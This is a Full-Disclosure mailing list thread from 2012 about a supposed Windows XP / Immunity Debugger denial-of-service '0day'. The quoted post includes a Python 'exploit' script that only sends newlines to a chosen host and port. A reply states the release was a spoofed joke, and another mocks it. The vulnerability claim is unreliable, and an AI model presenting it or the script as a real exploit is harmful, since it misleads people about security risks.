[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Windows XP denial of service 0day found in CTF exercise

This is awesome!

Its almost as awesome as a privilege escalation from root to root that
works only in backtrack.


On Tue, Apr 17, 2012 at 10:07,  <adam@xxxxxxxxxxxxxxxxxxxx> wrote:
> Guys, this is a fake release, someone spoofed my email and sent this out
> as a joke to mock the wicd release from last week. Please note that if you
> click on the links, there is nothing there concerning this.
>> On 04/17/2012 02:48 AM, Adam Behnke wrote:
>>> Immunity Debugger Remote Denial of Service 0Day Tested against
>>> version 1.76 and 1.80 on Windows XP distributions
>>> Has not been tested for potential privilege escalation vectors.
>>> We first wrote about Immunity Debugger here:
>>> http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/
>>>  Discovered by a student that wishes to remain anonymous in the
>>> course CTF. This 0day exploit for Windows was discovered by a
>>> student in the InfoSec Institute Ethical Hacking class, during an
>>> evening CTF exercise. The student wishes to remain anonymous, he
>>> has contributed a python version of the 0day. A patch that can be
>>> applied to Windows has not been made available. You can find a
>>> python version of the exploit to copy and paste here:
>>> #!/usr/bin/python #Windows XP denial of service 0day exploit
>>> discovered on 4.9.12 by InfoSec Institute student #For full write
>>> up and description go to
>>> http://www.infosecinstitute.com/courses/ethical_hacking_training.html
>> import sys
>>> import os import time import getopt import socket
>>> class Error(Exception): def __init__(self, error):
>>> self.errorStr=error  def __str__(self): return repr(self.errorStr)
>>> class Exploit():
>>> def __init__(self, targetHost, targetPort): self.targetHost =
>>> targetHost
>>> def exploit(self, targetHost, targetPort):
>>> try: socket.inet_aton(targetHost) s =
>>> socket.socket(socket.AF_INET,socket.SOCK_STREAM)
>>> s.connect((targetHost,targetPort)) except socket.error: raise
>>> Error("Unable to exploit (Connect failed.)") sys.exit(0)
>>> # exploit try: s.sendto("\n\n\n", (targetHost, targetPort))
>>> except: raise Error("Unable to exploit (Exploit failed.)")
>>> def usage(): print "[!] Usage:" print "      ( -h, --help ):" print "
>>> Print this message." print " ( --targetHost= ): Target host." print
>>> "            --targetHost=" print " ( --targetPort= ): Target
>>> port." print "               --targetPort=8888"
>>> def main(): print "[$] Windows XP 0Day" try: opts, args =
>>> getopt.getopt(sys.argv[1:], "h", ["help", "targetHost=",
>>> "targetPort="]) except getopt.GetoptError, err: # Print help
>>> information and exit: print '[!] Parameter error:' + str(err) #
>>> Will print something like "option -a not recognized" usage()
>>> sys.exit(0)
>>> targetHost=None targetPort=None  for opt, arg in opts: if opt in
>>> ("-h", "--help"): usage() sys.exit(0) elif opt =="--targetHost":
>>> targetHost=arg elif opt =="--targetPort": targetPort=arg else: # I
>>> would be assuming to say we'll never get here. print "[!] Parameter
>>> error." usage() sys.exit(0)  if not targetHost: print "[!]
>>> Parameter error: targetHost not set." usage() sys.exit(0)
>>> if not targetPort: print "[!] Parameter error: targetPort not
>>> set." usage() sys.exit(0)
>>> exploit = Exploit(targetHost, targetPort)
>>> print "[*] Attempting to exploit:"  try:
>>> exploit.exploit(targetHost, int(targetPort)) except Error as
>>> error: print "[!] Exploit Error: %s" % (error.errorStr) exit(0)
>>> print "[*] Exploit appears to have worked."
>>> # Standard boilerplate to call the main() function to begin # the
>>> program. if __name__=='__main__': main()
>>> _______________________________________________ Full-Disclosure -
>>> We believe in it. Charter:
>>> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
>>> sponsored by Secunia - http://secunia.com/
>> Version: GnuPG v1.4.12 (GNU/Linux)
>> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
>> QVHn9h6QlaVZ8SfunKn/zypiVmjqg2eJqSiqy8MzGIF1yRUf28W81Ugugqq62kvL
>> hFJcprsUhwnJCXZn+cWfPn64qoFKbN8uzIt85eWLcIBpIvdS7M5xm0g5Eva4hFrI
>> CqFmyfH+HwF4emZ0pecJ207ePetx51qj27Hgfd5Wey8W4Mx2svJpaTnCJMvcvg3i
>> FqE3/APG1qRrvFt0Qilqm6hpqSXhulQQQ8qw8k5BcHRn9FwJiDNQu/ykbSajOH4g
>> z452bxVBK/IQ7QQB+sqwvhi+fMIOE2f0Saw/SDgGUGLlUSPg3aQ/7pFjf3VxbaL9
>> K7xG3GFQp8g3Lp5Lvr0JkhNoePb0smymSTQ5o9NoTTAKELB/9lqSHOD4HEEGR09J
>> DoZTYh7ee8DVPiGI+ttatYYw4mQAJR89E98skirX0Tntn2XQNPdlcejZwPWH56PV
>> jB4+uKIlsQ0KgnbK5OSLVRFgxcq9OSK/pUEZPLPuAVJrkf17TfhF8by0lJYmyW8T
>> 6Qf8GMiQjtP1ovL3BDuyxzAm9n3OpUMudXdtqBFq5XuagnImR2yZZkuTgkIXOt05
>> 7PK28cqrKpTJixQNoiB4yLk65M1a8c8Ed/mXaHSFC04qn7RKhbMrdHmPzUnFpLCW
>> 4r6K58WTZ7qR2nTNKnQi
>> =Uoev
>> -----END PGP SIGNATURE-----
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/